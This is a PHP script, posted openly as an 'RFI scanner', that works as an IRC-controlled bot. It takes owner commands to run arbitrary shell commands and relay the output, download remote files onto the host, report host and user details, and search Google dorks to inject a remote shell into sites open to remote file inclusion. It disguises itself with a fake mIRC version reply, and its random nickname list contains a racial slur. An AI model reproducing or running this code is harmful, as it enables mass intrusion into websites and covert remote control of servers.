php RFI scanner

php RFI scanner

<?php
//Config//////////////////////////////////////////////////////////////////
$network = ""; // irc network address //
$port = 6667; // irc network port //
$channel = ""; // irc channel //
$channel_password = ""; // irc channel password //
$owner = ""; // owners nickname //
$owner_password = ""; // login password (MD5 Encoded) //
$trigger = "."; // bot trigger //
$max_results = 150; // maximum Google results //
//End config//////////////////////////////////////////////////////////////

@set_time_limit(0);

function randName(){
$nickparts = Array("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee", "sm4ck", "nigr", "sTench");
$tmp = "";
for($i=0;$i<2;$i++){
$tmp = $nickparts[mt_rand(0, count($nickparts)-1)] . mt_rand(1000,9999);
}
return $tmp;
}

$sck = fsockopen($network, $port, $errno, $errstr) or die("Connection error: " . $errstr);

function send($msg, $to){
global $sck, $nick;
fputs($sck, "PRIVMSG " . $to . " " . $msg . " ");
}

function pong(){
global $sck;
$dat = @fgets($sck, 1024);
$d = explode(" ", $dat);
if($d[0] == "PING"){
fputs($sck, "PONG " . $d[1]);
}
$dat = "";
}

function get_exec_function(){
$exec_functions = array("popen", "exec", "shell_exec");
$disabled_funcs = ini_get(disable_functions);
foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f;
}

function execute_command($exec_function, $command, $to){
if(!$exec_function){
send("No execution functions...", $to);
}
switch($exec_function){
case "popen": $h = popen($command, "r"); while(!feof($h)) send(fgets($h), $to); break;
case "exec": exec($command, $result); foreach($result as $r) send($r, $to); break;
case "shell_exec": send(shell_exec($command), $to); break;
}
}

function get($url, $out, $to){
if(!$o = fopen($out, "w"))
send("Unable to write file", $to);
else{
if(!$c = file_get_contents($url))
send("Unable to open remote file", $to);
else{
if(!fwrite($o, $c))
send("Unable to save file", $to);
else{
send("File saved", $to);
fclose($o);
}
}
}
}

function encodeDork($s){
$tmp = "";
for($i=0;$i<strlen($s);$i++){
$tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";
}
return urlencode($tmp);
}

function shellInject($url, $bug, $shell, $search){
$url = explode("/", $url);
$url = $url[2];
$url = (strpos($url, "www") !== false ? "http://" . $url : "http://www." . $url) . $bug . $shell . "??";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 4);
$ret = curl_exec($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($httpcode == 200){
if(strpos($ret, $search) !== false){
return $url;
}
}
return false;
}

function scan($dork, $bug, $shell, $search, $to){
global $max_results;
if(function_exists(curl_init)){
$ch = curl_init("http://www.google.com/search?q=" . encodeDork($dork) . "&start=0");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$ret = curl_exec($ch);
curl_close($ch);
preg_match_all("/of( about)* <b>([d,]+)</b>/", $ret, $max);
$max = str_replace(",", "", $max[2][0]);
$max = $max > $max_results ? $max_results : $max;
$i = 0;
while($i < $max){
$ch = curl_init("http://www.google.com/search?q=" . encodeDork($dork) . "&start=" . $i);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
$ret = curl_exec($ch);
preg_match_all("/<h2 class=r><a href="(.*?)" class=l>.*?</a>/", $ret, $links);
if(@$links[1]){
foreach($links[1] as $l){
$ret = shellInject($l, $bug, $shell, $search);
if($ret != false){
send("[+] Shell found: " . $ret, $to);
}
}
}
else{
send("No sites found", $to);
}
curl_close($ch);
$i = $max>10 ? $i+=10 : $i++;
send("$i scanned", $to);
pong();
}
}
else{
send("cURL is not enabled", $to);
}
}

$nick = randName();
sleep(1);
fputs($sck, "USER " . $nick . " ? * " . $nick . "@hotmail.com ");
sleep(1);
fputs($sck, "NICK " . $nick . " ");
$loggedin = false;
while(!feof($sck)){
$dat = fgets($sck, 4096);
$d = explode(" ", $dat);
preg_match_all("/:(.+)!(.+) PRIVMSG (.+) :$trigger(w+)s*(.+)*/", $dat, $cmd);
if($d[0] == "PING"){
fputs($sck, "PONG " . $d[1]);
}
if(strpos($dat, "HELP REGISTER") !== false){
fputs($sck, "JOIN " . $channel . " " . $channel_password . " ");
}
if(preg_match("/:(.+)!.+ PRIVMSG .+ :.VERSION(.)/", $dat, $v)){
fputs($sck, "NOTICE " . $v[1] . " " . $v[2] . "VERSION mIRC v6.3 Khaled Mardam-Bey" . $v[2] . " ");
}
if(@$cmd[4][0]){
$from = $cmd[1][0];
$from_host = $cmd[2][0];
$to = $cmd[3][0] == $nick ? $cmd[1][0] : $cmd[3][0];
$command = $cmd[4][0];
$args = $cmd[5][0];
if($from == $owner && $loggedin == true){
switch($command){
case "cmd": execute_command(get_exec_function(), $args, $to); break;
case "die": fputs($sck, "QUIT :Received die from " . $from); die();
case "get": $a = explode(" ", $args); get($a[0], $a[1], $to); break;
case "inf": send("Host: " . $_SERVER[HTTP_HOST] . " Whoami: " . @exec(whoami), $to); break;
case "raw": fputs($sck, $args . " "); break;
case "rfi": $a = explode(" ", $args);
if(count($a) > 3){send("Beginning RFI scan", $to); scan($a[0], $a[1], $a[2], $a[3], $to); send("RFI scan complete", $to);}
else send("Usage: (dork) (bug) (shell) (search)", $to);
break;
case "say": send($args, $to); break;
default: send("Unknown command.", $to);
}
}
elseif($from == $owner && $loggedin == false){
if($command == "login"){
if(md5($args) == $owner_password){
$loggedin = true;
send("User $from successfully logged in.", $to);
}
else{
send("Login failed.", $to);
}
}
}
}
$dat = "";
}
?>

credits flyZ to: Array("gohan", "x4n4r", "c0la", "mari0", "johan", "rex", "r00tz", "smilee", "sm4ck", "nigr", "sTench");

Have fun. =)